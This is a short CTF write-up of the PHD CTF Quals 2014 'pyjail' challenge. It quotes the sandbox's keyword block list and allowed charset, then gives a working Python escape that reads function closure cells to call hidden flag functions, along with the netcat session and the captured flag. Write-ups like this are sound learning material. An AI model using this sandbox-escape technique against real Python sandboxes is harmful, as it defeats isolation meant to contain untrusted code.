PHD CTF Quals 2014 - pyjail
The task gives us a python sandbox to escape. We aren’t allowed to use any of the builtin function and we are denied to use this words:
(?:__|import|globals|locals|exec|eval|join|format|replace|translate|try|except|with|content|frame|back)
Also we have limited charset:
\n\r0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}
Now inside sandbox() function there are 2 functions: we_must_be_sure_flag_part1_is_ready and we_must_be_sure_flag_part2_is_ready that copy to FLAG variable its part of the flag. Also flag will be printed only in case FLAG != part1_of_flag. In divider function() we find out that for have the complete flag we need that int(v1) / int(v2) == 13.37 ( hard uh?). For exploit this we used divider function that is passed in our context during the eval of our input and we called the function we_must_be_sure_flag_part1_is_ready() and we_must_be_sure_flag_part2_is_ready() using its data model attribute “func_closure” + cells.
Exploiting code:
root@kaiman:/home/nms/phd$ nc 195.133.87.177 1337
leetleetleetleet
Welcome to pyjail!
Try to get the flag!
Use ctrl+D or --- to submit your code
def get_cell_value(cell):
return type(lambda: 0)(
(lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
)()
print get_cell_value(div.func_closure[8])()
print get_cell_value(div.func_closure[9])()
---
None
None
Flag is 7hE_0w15_4R3_n07_wh47_7h3Y_533m--7hEr3_15_4_m4n_1n_a_5m111n9_649
root@kaiman:/home/nms/phd$
Razor4x